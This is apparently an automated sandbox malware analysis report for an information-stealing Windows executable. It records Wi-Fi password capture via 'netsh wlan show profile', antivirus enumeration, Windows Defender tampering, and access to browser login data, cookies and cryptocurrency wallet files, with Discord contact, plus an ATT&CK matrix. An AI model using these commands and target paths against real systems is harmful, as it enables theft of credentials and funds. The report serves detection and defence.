              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3AD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6BA3AD010
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeCode function: 0_2_00007FF6BA3C5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6BA3C5C00
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeCode function: 83_2_00007FF6D7F148CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,83_2_00007FF6D7F148CC
              Source: C:\Users\user\AppData\Local\Temp\bound.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7516, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: El9HaBFrFM.exe, 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: El9HaBFrFM.exe, 00000001.00000002.2251250349.0000025068A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7516, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: El9HaBFrFM.exe PID: 7532, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              41
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              1
              Browser Extensions
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts22
              Command and Scripting Interpreter
              2
              Registry Run Keys / Startup Folder
              111
              Process Injection
              21
              Obfuscated Files or Information
              Security Account Manager510
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              11
              Software Packing
              NTDS161
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials161
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546321 Sample: El9HaBFrFM.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 76 discord.com 2->76 78 ip-api.com 2->78 98 Found malware configuration 2->98 100 Sigma detected: Capture Wi-Fi password 2->100 102 Multi AV Scanner detection for submitted file 2->102 104 11 other signatures 2->104 11 El9HaBFrFM.exe 23 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 68 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->68 dropped 70 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->70 dropped 72 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->72 dropped 74 16 other files (none is malicious) 11->74 dropped 130 Modifies Windows Defender protection settings 11->130 132 Adds a directory exclusion to Windows Defender 11->132 134 Tries to harvest and steal WLAN passwords 11->134 138 2 other signatures 11->138 18 El9HaBFrFM.exe 1 89 11->18         started        94 code.jquery.com 15->94 96 127.0.0.1 unknown unknown 15->96 136 System process connects to network (likely due to code injection or exploit) 15->136 file6 signatures7 process8 dnsIp9 80 discord.com 162.159.128.233, 443, 51253 CLOUDFLARENETUS United States 18->80 82 ip-api.com 208.95.112.1, 51252, 80 TUT-ASUS United States 18->82 106 Found many strings related to Crypto-Wallets (likely being stolen) 18->106 108 Tries to harvest and steal browser information (history, passwords, etc) 18->108 110 Modifies Windows Defender protection settings 18->110 112 5 other signatures 18->112 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 1 18->27         started        29 27 other processes 18->29 signatures10 process11 signatures12 114 Suspicious powershell command line found 22->114 116 Encrypted powershell cmdline option found 22->116 118 Bypasses PowerShell execution policy 22->118 120 Uses netsh to modify the Windows network and firewall settings 22->120 31 powershell.exe 23 22->31         started        34 conhost.exe 22->34         started        122 Modifies Windows Defender protection settings 25->122 124 Removes signatures from Windows Defender 25->124 36 powershell.exe 24 25->36         started        46 2 other processes 25->46 126 Adds a directory exclusion to Windows Defender 27->126 38 powershell.exe 27->38         started        40 conhost.exe 27->40         started        128 Tries to harvest and steal WLAN passwords 29->128 42 getmac.exe 29->42         started        44 powershell.exe 29->44         started        48 52 other processes 29->48 process13 file14 140 Loading BitLocker PowerShell Module 36->140 142 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->142 144 Writes or reads registry keys via WMI 42->144 62 C:\Users\user\AppData\Local\Temp\BfsYI.zip, RAR 48->62 dropped 64 C:\Users\user\AppData\...\4mvljvuo.cmdline, Unicode 48->64 dropped 51 chrome.exe 48->51         started        54 csc.exe 48->54         started        signatures15 process16 dnsIp17 84 192.168.2.4, 138, 443, 49389 unknown unknown 51->84 86 239.255.255.250 unknown Reserved 51->86 57 chrome.exe 51->57         started        66 C:\Users\user\AppData\Local\...\4mvljvuo.dll, PE32 54->66 dropped 60 cvtres.exe 54->60         started        file18 process19 dnsIp20 88 trksyln.net 160.153.155.187, 443, 49737, 49738 GODADDY-AMSDE United States 57->88 90 code.jquery.com 151.101.66.137, 443, 49754 FASTLYUS United States 57->90 92 51 other IPs or domains 57->92

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              El9HaBFrFM.exe53%ReversingLabsWin64.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd0%ReversingLabs
